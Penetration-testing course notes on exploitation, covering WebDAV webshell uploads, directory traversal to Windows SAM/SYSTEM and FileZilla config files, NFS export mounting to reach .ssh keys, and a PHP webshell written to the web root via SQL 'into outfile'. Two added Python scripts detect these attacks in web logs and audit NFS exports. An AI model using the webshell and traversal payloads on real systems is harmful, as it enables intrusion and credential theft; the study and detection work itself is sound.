Nathanf | Advanced Penetration Testing | Module 7 - Exploitation

exploit 1
cadaver, webDav
kali has pre built web shells in different languages
Step 1 – upload a file to server that executes code for you or allows you to execute code (webshell)
-upload a file that takes command injection via url query parameters
This can also be done via metasploit
-for reverse tcp set ExitOnSession to false in the options so it doesn't stop listening after the first session
exploit 3
Directory traversal, Dump sam files to discover usernames and passwords
Directory traversal – can also be done from url
index?../../../../../bin.etc – if the browser offers to save a file we've found it, otherwise we haven't
WINDOWS/system32/sam
Windows/repair/sam – saves the file, but you need the SYSKEY from ../../../../../WINDOWS/repair/system to access it
filezilla ftp
../../../../../xamp/FileZillaFtp/FileZilla server.xml – filezilla config file, stores passwords
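The two techniques noted above (a webshell dropped over WebDAV, then requested with a command in the query string; directory traversal pulling files like repair/sam or the FileZilla config) both leave a clear trail in the web server's access log. The script below is an added detection example, not part of the course notes: it parses combined-format log lines, decodes URL encoding (including double encoding) before looking for ".." segments, flags PUT/MOVE/COPY of script files, and correlates later requests to a path that was just uploaded. The log lines are constructed for the example; the file names matched are the ones listed in the notes.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format) for illustration; not real traffic.
# The traversal targets are the ones listed in the notes above (repair/sam, FileZilla server.xml).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "PUT /webdav/shell.php HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
10.0.0.7 - - [10/Oct/2023:13:56:10 +0000] "GET /webdav/shell.php?cmd=whoami HTTP/1.1" 200 14 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:57:22 +0000] "GET /index.php?page=../../../../WINDOWS/repair/sam HTTP/1.1" 200 262144 "-" "curl/7.88"
10.0.0.9 - - [10/Oct/2023:13:57:40 +0000] "GET /index.php?page=..%2f..%2f..%2fxamp%2fFileZillaFtp%2fFileZilla%20server.xml HTTP/1.1" 200 4096 "-" "curl/7.88"
10.0.0.5 - - [10/Oct/2023:13:58:00 +0000] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)
# Extensions the web server executes rather than serving as static content.
SCRIPT_EXT = ('.php', '.php3', '.phtml', '.asp', '.aspx', '.jsp', '.jspx', '.cgi', '.pl')
# WebDAV methods that create or rename content on the server.
UPLOAD_METHODS = {'PUT', 'MOVE', 'COPY'}
# ".." as a path segment: preceded by start of string, "/" or a query delimiter, followed by "/" or end.
TRAVERSAL_RE = re.compile(r'(?:^|[/=&?;])\.\.(?:/|$)')
# Files the notes above single out as traversal targets (compared case-insensitively after decoding).
SENSITIVE = ('/system32/sam', '/repair/sam', '/repair/system', 'filezilla server.xml', '/etc/passwd', '/etc/shadow')


def fully_decode(s, rounds=3):
    """Undo URL encoding until it stops changing (bounded), so %2e%2e%2f and
    double-encoded %252e forms are compared in the same form as a plain ../"""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the alert tags raised by one parsed request."""
    alerts = []
    target = fully_decode(entry['target']).replace('\\', '/')
    path = target.split('?', 1)[0]
    if entry['method'] in UPLOAD_METHODS and path.lower().endswith(SCRIPT_EXT):
        alerts.append('webdav-script-upload')
    if TRAVERSAL_RE.search(target):
        alerts.append('directory-traversal')
        if any(s in target.lower() for s in SENSITIVE):
            alerts.append('sensitive-file-access')
    return alerts


def scan(log_text):
    """Classify every line and additionally correlate later requests to a script
    that an earlier PUT/MOVE/COPY created. Returns (ip, method, target, alerts) tuples."""
    uploaded = set()
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        alerts = classify(entry)
        path = fully_decode(entry['target']).split('?', 1)[0]
        if 'webdav-script-upload' in alerts:
            uploaded.add(path)
        elif path in uploaded:
            alerts.append('request-to-uploaded-script')
        if alerts:
            findings.append((entry['ip'], entry['method'], entry['target'], alerts))
    return findings


if __name__ == '__main__':
    for ip, method, target, alerts in scan(SAMPLE_LOG):
        print(f'{ip:10} {method:5} {target:70} {", ".join(alerts)}')
```

On the sample the two benign GETs produce nothing; the PUT of shell.php, the follow-up request to it, and both traversal requests are flagged. Decoding before matching is what makes the %2f-encoded attempt in line 5 look the same as the plain one in line 4.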
Exploit 4
/tikiwiki
search metasploit for exploits
exploit 6
whoami = display which user you are
exploit 6
display network file system: in cli -> showmount -e 'ip'
to mount the exported network filesystem:
mount -t nfs -o nolock 'ip':/exportDir /exportlocation
hidden files: ls -a
.ssh folder stores keys
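What showmount -e reveals to a client is decided by the server's /etc/exports, so the defensive check is to audit that file: exports open to any host, world-writable exports, and no_root_squash (which lets a client's root read and write files such as the .ssh keys mentioned above). The script below is an added example, not part of the notes; the exports file content is constructed for illustration.

```python
import re

# Constructed /etc/exports content for illustration; not taken from any real host.
SAMPLE_EXPORTS = """\
# build tree for the CI runners
/export/build   192.168.1.0/24(rw,sync,root_squash)
/export/home    *(rw,no_root_squash,insecure)
/export/public  *(ro,sync)
/export/backup  10.0.0.5(rw,sync) 10.0.0.6(rw,sync,no_root_squash)
"""

# Options that weaken an export, with the reason a reviewer would cite.
RISKY_OPTIONS = {
    'no_root_squash': 'remote root is not squashed, so root on a client can read and write any file in the export (e.g. .ssh keys)',
    'insecure': 'requests from unprivileged source ports are accepted, so any local user on a client can speak NFS',
}


def parse_exports(text):
    """Return a list of (path, client, options) tuples, one per client spec.
    A path with no client spec, or a spec with an empty host part, exports to everyone."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, specs = parts[0], parts[1:] or ['*']
        for spec in specs:
            m = re.match(r'^([^(]*)(?:\((.*)\))?$', spec)
            client = m.group(1) or '*'
            options = set(filter(None, (m.group(2) or '').split(',')))
            entries.append((path, client, options))
    return entries


def is_world(client):
    """True for a client spec that matches any host."""
    return client in ('*', '0.0.0.0/0', '::/0')


def audit_exports(text):
    """Return (path, client, reason) findings for every weak export entry."""
    findings = []
    for path, client, options in parse_exports(text):
        if is_world(client):
            findings.append((path, client, 'exported to any host'))
            if 'rw' in options:
                findings.append((path, client, 'world-writable export'))
        for opt, reason in RISKY_OPTIONS.items():
            if opt in options:
                findings.append((path, client, f'{opt}: {reason}'))
    return findings


if __name__ == '__main__':
    for path, client, reason in audit_exports(SAMPLE_EXPORTS):
        print(f'{path:16} {client:16} {reason}')
```

On the sample only /export/build passes: /export/home collects four findings, /export/public is readable by anyone, and the second client of /export/backup is flagged for no_root_squash.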
exploitation 2
open web interface – phpmyadmin, can be used to run sql commands (sql injection)
creating a system command shell which accepts a parameter via the url, placed on the server via sql
run system command ->
select "<?php system($_GET['cmd']); ?>" into outfile "C:\\xamp\\htdocs\\shell.php"
\\ = escape, so you don't end up with a long file name on the system
atftpd --daemon --bind-address 'ip' /tmp
netstat -antp
daemon = it will listen in the background
other shell -> powershell
tftp = Trivial file transfer protocol